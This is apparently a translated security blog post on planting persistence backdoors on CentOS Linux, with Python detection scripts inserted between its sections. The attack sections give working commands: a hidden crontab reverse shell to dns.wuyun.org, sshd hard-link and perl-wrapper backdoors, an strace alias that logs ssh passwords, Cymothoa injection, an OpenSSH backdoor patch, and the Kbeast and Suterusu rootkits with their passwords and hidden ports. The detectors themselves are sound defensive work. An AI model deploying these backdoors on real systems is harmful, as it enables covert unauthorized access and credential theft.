L3m0n 2016/05/16 10:23
0x00 Preface
A while ago I wrote a small set of notes on intranet work: zone.wooyun.org/content/264…
I did not expect it to be so well received; it was also the first time I was taken aback like that. Recently I ran into rootkit planting during a competition and felt rather helpless, so I studied the subject. The content is older, well-known technique, but it also adds another chapter to those notes (for persistence under a Windows domain, see the article by "three good student"). Experts, feel free to skip.
Notes: github.com/l3m0n/pente…
Test environment: CentOS 6.5
0x01 crontab
Scheduled tasks: a perennial favourite.
Every 60 minutes, spawn a shell back to port 53 of dns.wuyun.org:
```bash
# Appends the job to the current user's crontab. The \r followed by "no crontab for <user>"
# and 100 characters of padding makes `crontab -l` look empty on a terminal.
(crontab -l; printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53; exec 0<&9; exec 1>&9 2>&1; /bin/bash --noprofile -i; \rno crontab for `whoami`%100c\n") | crontab -
```
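As an added example (not code from the original post), here is a small checker for the defender's side of this trick: it reads the raw crontab spool file instead of trusting what `crontab -l` shows on a terminal, reports any carriage return in a job line, and flags the reverse-shell indicators used above. The sample crontab is constructed; on a live host you would point it at the user's spool file (/var/spool/cron/<user> on CentOS), which is the assumed path.

```python
import re
import sys

# Constructed sample: the second entry is the hidden reverse-shell job from the
# section above (a literal \r, then "no crontab for root" and padding); the first is benign.
SAMPLE_CRONTAB = (
    "0 3 * * * /usr/bin/find /tmp -mtime +7 -delete\n"
    "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53; exec 0<&9; exec 1>&9 2>&1; "
    "/bin/bash --noprofile -i; \rno crontab for root" + " " * 100 + "\n"
)

# Each indicator is a regex plus the reason reported when it matches.
INDICATORS = [
    (re.compile(r"/dev/(tcp|udp)/"), "bash /dev/tcp or /dev/udp network redirection"),
    (re.compile(r"\bexec\s+\d+<>"), "file descriptor opened read/write on a socket"),
    (re.compile(r"\b(bash|sh)\b[^\n]*\s-i\b"), "interactive shell started from cron"),
    (re.compile(r"\bnc\b[^\n]*\s-e\b"), "netcat with -e (command bound to a connection)"),
]


def scan_crontab(text):
    """Return (line_number, reason) findings for the raw content of a crontab file.

    The text is split on \\n only, so a carriage return stays inside its line and
    can be reported: on a terminal, \\r makes `crontab -l` overwrite the real job
    with whatever follows it.
    """
    findings = []
    for lineno, line in enumerate(text.split("\n"), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if "\r" in line:
            findings.append((lineno, "carriage return hides the rest of the line in crontab -l output"))
        for pattern, reason in INDICATORS:
            if pattern.search(line):
                findings.append((lineno, reason))
    return findings


def scan_crontab_file(path):
    """Read a spool file directly (newline='' keeps \\r bytes intact) and scan it."""
    with open(path, "r", newline="") as fh:
        return scan_crontab(fh.read())


if __name__ == "__main__":
    # With a path argument scan that file, otherwise scan the constructed sample.
    findings = scan_crontab_file(sys.argv[1]) if len(sys.argv) > 1 else scan_crontab(SAMPLE_CRONTAB)
    for lineno, reason in findings:
        print("line %d: %s" % (lineno, reason))
```

The benign job produces nothing; the hidden job is reported four times (carriage return, /dev/tcp, socket descriptor, interactive shell). Running it as root over every file in the spool directory, plus /etc/crontab and /etc/cron.d, covers the places a job can be planted.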
0x02 Hard link sshd
First the firewall pitfall: turn it off before testing.
```bash
service iptables stop
```
Otherwise the connection fails with:
```
ssh: connect to host 192.168.206.142 port 2333: No route to host
```
```bash
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333
# from the attacking machine:
ssh root@192.168.206.142 -p 2333
```
Log in with root, bin, ftp or mail as the user name and any password.
Backdoor investigation:
```bash
netstat -anopt
```
Locate the offending process and remove it:
```bash
ps -ef | grep pid      # pid: the process id shown by netstat
ls -al /tmp/su
kill -9 pid
rm -rf /tmp/su
```
0x03 SSH server wrapper
Condition: sshd must be enabled. While nobody is connected there is no extra port or process to see, and `last` shows nothing.
```bash
cd /usr/sbin
mv sshd ../bin
echo '#!/usr/bin/perl' > sshd
# if the client's source port is 13377 ("4A" in network byte order) hand out a shell,
# otherwise exec the real sshd that was moved to /usr/bin
echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >> sshd
echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV;' >> sshd
chmod u+x sshd
/etc/init.d/sshd restart
```
Run from Kali:
```bash
socat STDIO TCP4:192.168.206.142:22,sourceport=13377
```
To pick a different source port, work out the bytes the regex has to match: the port sits in network byte order right after the two-byte address family, so `^..4A` matches 13377.
```python
>>> import struct
>>> buffer = struct.pack('>I', 19526)
>>> print repr(buffer)
'\x00\x00LF'
>>> buffer = struct.pack('>I', 13377)
>>> print repr(buffer)
'\x00\x004A'
```
Backdoor investigation:
```bash
netstat -anopt
# then inspect the sshd process and its binary (1786 was the pid in this test):
ll /proc/1786
cat /usr/sbin/sshd
```
Restore:
```bash
rm -rf /usr/sbin/sshd; mv /usr/bin/sshd /usr/sbin/sshd
```
0x04 SSH keylogger
Open ~/.bashrc of the current user in vim and append at the end:
```bash
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
```
Then make it take effect:
```bash
source .bashrc
```
From then on, whenever su or ssh is run locally, it is logged under /tmp.
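An added example for the defender's side of this section (not code from the original post): a scanner for shell rc files that reports aliases or shell functions shadowing commands that read passwords from the terminal, such as the ssh alias above. The sample .bashrc is constructed; on a real host you would feed it ~/.bashrc, ~/.bash_profile, ~/.profile and the files under /etc/profile.d for every account, which are the assumed locations.

```python
import re

# Constructed ~/.bashrc for the demo; the third line is the alias from the section above.
SAMPLE_BASHRC = """\
# .bashrc
alias ll='ls -al'
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'
"""

# Commands whose stdin carries passwords and which an attacker would wrap.
SENSITIVE = {"ssh", "su", "sudo", "scp", "sftp", "passwd", "mysql"}
ALIAS_RE = re.compile(r"^\s*alias\s+([\w.-]+)=(.*)$")
FUNC_RE = re.compile(r"^\s*(?:function\s+)?([\w.-]+)\s*\(\)")
# Tracers and capture helpers; any of these in an alias for a sensitive command is suspicious.
TRACERS = re.compile(r"\b(strace|ltrace|script|tee)\b")


def find_shadowed_commands(rc_text):
    """Return (line_number, command, kind) for rc-file lines that shadow a sensitive command."""
    findings = []
    for lineno, line in enumerate(rc_text.splitlines(), 1):
        m = ALIAS_RE.match(line)
        if m:
            name, value = m.group(1), m.group(2)
            if name in SENSITIVE:
                if TRACERS.search(value) or "/tmp/" in value:
                    findings.append((lineno, name, "alias wrapping with tracer or /tmp logging"))
                else:
                    findings.append((lineno, name, "alias shadows a sensitive command"))
            continue
        m = FUNC_RE.match(line)
        if m and m.group(1) in SENSITIVE:
            findings.append((lineno, m.group(1), "shell function shadows a sensitive command"))
    return findings


def scan_rc_file(path):
    """Scan one rc file on disk."""
    with open(path) as fh:
        return find_shadowed_commands(fh.read())


if __name__ == "__main__":
    for lineno, name, kind in find_shadowed_commands(SAMPLE_BASHRC):
        print("line %d: %s (%s)" % (lineno, name, kind))
```

Any alias of a sensitive command is reported, because even a harmless-looking one deserves a glance; a tracer or a /tmp log path in the alias value marks it as the keylogger pattern. The `type ssh` builtin in a fresh shell, and a look for the log files the alias writes (`ls /tmp/sshpwd-*`), confirm a hit on a live box.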
0x05 Cymothoa process-injection backdoor
The nice part is that the injected process only needs its own permissions: the shell you get back has the privileges of that process (root is not required). Of course, if the process restarts or dies the backdoor goes with it, and the activity is fairly obvious.
Thread injection:
```bash
# inject into pid 2270 with shellcode 1 (bind shell); -y gives the port
./cymothoa -p 2270 -s 1 -y 7777
```
Connect to it:
```bash
nc -vv ip 7777
```
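Since injected code has to live somewhere in the target's address space, a /proc/<pid>/maps check is the usual first look on the defender's side. The following is an added example, not code from the original post or the Cymothoa project: it parses maps lines and flags executable regions that are writable or not backed by a file. The maps excerpt is constructed. It is a heuristic: JIT runtimes legitimately create anonymous executable memory, and code written into an existing read-only text segment is not caught by it (comparing that segment with the on-disk file is the next step).

```python
# Constructed /proc/<pid>/maps excerpt: a file-backed text segment, its data,
# the heap, an anonymous rwx region (where injected code typically lives),
# the stack and the kernel-provided vdso.
MAPS_SAMPLE = """\
00400000-004e0000 r-xp 00000000 08:01 1234567                    /usr/sbin/sshd
006e0000-006e2000 rw-p 000e0000 08:01 1234567                    /usr/sbin/sshd
01b3c000-01b5d000 rw-p 00000000 00:00 0                          [heap]
7f3a4c000000-7f3a4c021000 rwxp 00000000 00:00 0
7fff5e6a0000-7fff5e6c1000 rw-p 00000000 00:00 0                  [stack]
7fff5e7fe000-7fff5e800000 r-xp 00000000 00:00 0                  [vdso]
"""

# Anonymous executable mappings that the kernel itself provides to every process.
KERNEL_ANON_EXEC = {"[vdso]", "[vsyscall]"}


def parse_maps(text):
    """Parse /proc/<pid>/maps lines into dicts (start, end, perms, inode, path)."""
    regions = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        start, end = (int(x, 16) for x in parts[0].split("-"))
        regions.append({
            "start": start,
            "end": end,
            "perms": parts[1],
            "inode": int(parts[4]),
            "path": parts[5] if len(parts) > 5 else "",
        })
    return regions


def suspicious_regions(regions):
    """Flag executable regions that are writable or not backed by a file (inode 0)."""
    flagged = []
    for r in regions:
        if "x" not in r["perms"] or r["path"] in KERNEL_ANON_EXEC:
            continue
        anonymous = r["inode"] == 0
        if anonymous or "w" in r["perms"]:
            flagged.append(r)
    return flagged


def scan_pid(pid):
    """Read the live maps of one process (needs permission on /proc/<pid>/maps)."""
    with open("/proc/%d/maps" % pid) as fh:
        return suspicious_regions(parse_maps(fh.read()))


if __name__ == "__main__":
    for r in suspicious_regions(parse_maps(MAPS_SAMPLE)):
        print("%012x-%012x %s %s" % (r["start"], r["end"], r["perms"], r["path"] or "(anonymous)"))
```

On the sample only the anonymous rwx region is reported; the sshd text segment, the heap, the stack and the vdso pass. Looping `scan_pid` over every pid in /proc gives a host-wide sweep.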
0x06 openssh rootkit
Download: core.ipsecs.com/rootkit/pat…
First apply the patch:
```bash
wget http://mirror.corbina.net/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.tar.gz
cp sshbd5.9p1.diff openssh-5.9p1/
cd openssh-5.9p1
patch < sshbd5.9p1.diff
```
Install dependencies:
```bash
yum install zlib-devel
yum install openssl-devel
yum install pam-devel
yum install krb5-libs
```
Edit includes.h (the patch's settings, including the backdoor password, live there).
Compile, install and restart the sshd service:
```bash
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make && make install && service sshd restart
```
Usage:
The account passwords of incoming and outgoing SSH logins are recorded (wrong ones too), and the password set in the configuration file also lets you log in over SSH, including as root.
Detection:
Find the suspicious sshd, check the last login IPs, and finally kill its process; how to clean up properly is not yet clear to me.
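The three sshd tricks so far (the hard-linked copy in 0x02, the perl wrapper in 0x03 and the rebuilt binary in 0x06) all leave something checkable: a listener started from an odd path or under another name, an sshd that is a script instead of an ELF file, or a binary whose hash no longer matches the package. The block below is an added example, not code from the original post; it checks all three on constructed input. The listener inventory mirrors what you would build from `ss -lntp` plus /proc/<pid>/exe, comm and cmdline, and the baseline hash is assumed to come from a trusted record (on CentOS `rpm -V openssh-server` does the same comparison against the package database).

```python
import hashlib
import os

ELF_MAGIC = b"\x7fELF"
# Directories a service binary is expected to run from; anything else is worth a look.
TRUSTED_DIRS = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/", "/usr/lib/", "/usr/libexec/")

# Constructed listener inventory. pid 1786 models the hard-link trick from 0x02:
# argv[0] is /tmp/su and the process name is "su", but the executable is sshd.
SAMPLE_LISTENERS = [
    {"pid": 1203, "port": 22, "comm": "sshd", "exe": "/usr/sbin/sshd", "argv0": "/usr/sbin/sshd"},
    {"pid": 1786, "port": 2333, "comm": "su", "exe": "/usr/sbin/sshd", "argv0": "/tmp/su"},
]


def classify_binary(data):
    """A real sshd is an ELF executable; a wrapper is a script; anything else is odd."""
    if data.startswith(ELF_MAGIC):
        return "elf"
    if data.startswith(b"#!"):
        return "script"
    return "other"


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def check_sshd_content(data, baseline_sha256=None):
    """Reasons why the given sshd file content looks replaced or rebuilt."""
    reasons = []
    kind = classify_binary(data)
    if kind != "elf":
        reasons.append("sshd is a %s, not an ELF binary" % kind)
    if baseline_sha256 is not None and sha256_hex(data) != baseline_sha256:
        reasons.append("sha256 differs from the recorded baseline")
    return reasons


def check_sshd_path(path="/usr/sbin/sshd", baseline_sha256=None):
    """Same check against a file on disk."""
    with open(path, "rb") as fh:
        return check_sshd_content(fh.read(), baseline_sha256)


def in_trusted_dir(path):
    return path.startswith(TRUSTED_DIRS)


def check_listeners(listeners):
    """(pid, reason) for listeners started from odd places or running under another name."""
    findings = []
    for l in listeners:
        if not in_trusted_dir(l["argv0"]) or not in_trusted_dir(l["exe"]):
            findings.append((l["pid"], "port %d served from %s (exe %s)" % (l["port"], l["argv0"], l["exe"])))
        if os.path.basename(l["exe"]) == "sshd" and l["comm"] != "sshd":
            findings.append((l["pid"], "sshd executable running under the name %r" % l["comm"]))
    return findings


if __name__ == "__main__":
    for pid, reason in check_listeners(SAMPLE_LISTENERS):
        print("pid %d: %s" % (pid, reason))
    print(check_sshd_content(b"#!/usr/bin/perl\nexec ...\n"))
```

The perl wrapper fails the ELF check outright; the rebuilt sshd from 0x06 is a perfectly valid ELF and is only caught by the hash comparison, which is why the baseline has to come from outside the host.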
0x07 Kbeast rootkit
core.ipsecs.com/rootkit/ker…
```bash
tar -zxvf ipsecs-kbeast-v1.tar.gz
cd kbeast-v1/
vi config.h
```
Key configuration:
```cpp
#define _LOGFILE_ "acctlog"       // rootkit log file
#define _H4X_PATH_ "/usr/_h4x_"   // install directory
#define _HIDE_PORT_ 23333         // backdoor port, hidden from netstat
#define _RPASSWORD_ "lolloltest"  // backdoor password
#define _MAGIC_NAME_ "root"
```
Usage:
1. Logging
2. Telnet connection
- Disadvantage: it does not survive a reboot, so it has to be added to a boot item.
- Advantage: the backdoors above are all tied to SSH or only keep low privileges; this one opens a separate port of its own.
Detection: with the process name changed, finding it is actually a bit troublesome.
0x08 Mafix + Suterusu rootkit
1. Mafix
```bash
./root lolloltest 23333
```
This gives SSH on port 23333, and root can log in with the password lolloltest, but the port is not hidden.
This is where Suterusu comes in.
2. Suterusu
Menu:
```
Get root               $ ./sock 0
Hide PID               $ ./sock 1 [pid]
Unhide PID             $ ./sock 2 [pid]
Hide TCPv4 port        $ ./sock 3 [port]
Unhide TCPv4 port      $ ./sock 4 [port]
Hide TCPv6 port        $ ./sock 5 [port]
Unhide TCPv6 port      $ ./sock 6 [port]
Hide UDPv4 port        $ ./sock 7 [port]
Unhide UDPv4 port      $ ./sock 8 [port]
Hide UDPv6 port        $ ./sock 9 [port]
Unhide UDPv6 port      $ ./sock 10 [port]
Hide file/directory    $ ./sock 11 [name]
Unhide file/directory  $ ./sock 12 [name]
```
Compile:
```bash
make linux-x86 KDIR=/lib/modules/$(uname -r)/build
gcc sock.c -o sock
```
Used together with Mafix (to hide its port):
```bash
./sock 3 [port]
```
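Both Kbeast (0x07, `_HIDE_PORT_`) and Suterusu (0x08, `./sock 3`) exist to make a listening port disappear from the tools an administrator runs, so the defender's check is to compare views that are hidden at different layers. The following is an added example, not code from the original post or either project: it parses the kernel's /proc/net/tcp table, diffs it against the ports a userland tool reported, and offers a plain TCP connect as an independent probe. The /proc/net/tcp excerpt is constructed (22 and 23333 listening). Caveat: a trojaned netstat (userland rootkits such as Mafix) is caught by the diff, but a kernel module that filters /proc/net/tcp itself hides from both views; then only the connect probe, or a port scan from another host, shows the port.

```python
import socket

# Constructed /proc/net/tcp excerpt: ports 22 (0x0016) and 23333 (0x5B25) in LISTEN
# state (0A), plus one established connection (01) to port 22.
PROC_NET_TCP_SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:5B25 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:C1A2 01 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 20 4 30 10 -1
"""
TCP_LISTEN = "0A"


def listening_ports(proc_net_tcp):
    """Parse /proc/net/tcp text and return the set of local ports in LISTEN state."""
    ports = set()
    for line in proc_net_tcp.splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 4:
            continue
        local_addr, state = fields[1], fields[3]
        if state == TCP_LISTEN:
            ports.add(int(local_addr.split(":")[1], 16))  # port is hex, host order
    return ports


def hidden_ports(proc_net_tcp, tool_reported):
    """Ports the kernel table lists as LISTEN that the userland tool did not report."""
    return listening_ports(proc_net_tcp) - set(tool_reported)


def probe_port(port, host="127.0.0.1", timeout=0.5):
    """Independent check: does a TCP connect succeed even though nothing reports the port?"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        return sock.connect_ex((host, port)) == 0
    finally:
        sock.close()


def live_hidden_ports(tool_reported):
    """Compare the live /proc/net/tcp with the ports reported by `ss -lnt` or netstat."""
    with open("/proc/net/tcp") as fh:
        return hidden_ports(fh.read(), tool_reported)


if __name__ == "__main__":
    # Pretend the trojaned tool only admitted to port 22.
    print(sorted(hidden_ports(PROC_NET_TCP_SAMPLE, [22])))
```

On the sample, a tool that reports only port 22 leaves 23333 as the hidden listener. On a live host, feed `live_hidden_ports` the port list parsed from `ss -lnt`, and run `probe_port` over a range (or a scan from a second machine) to cover the kernel-level case.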
0x09 Resources
- www.aldeid.com/wiki/Cymoth…
- Phrack.org/issues/68/9…
- www.joychou.org/index.php/w…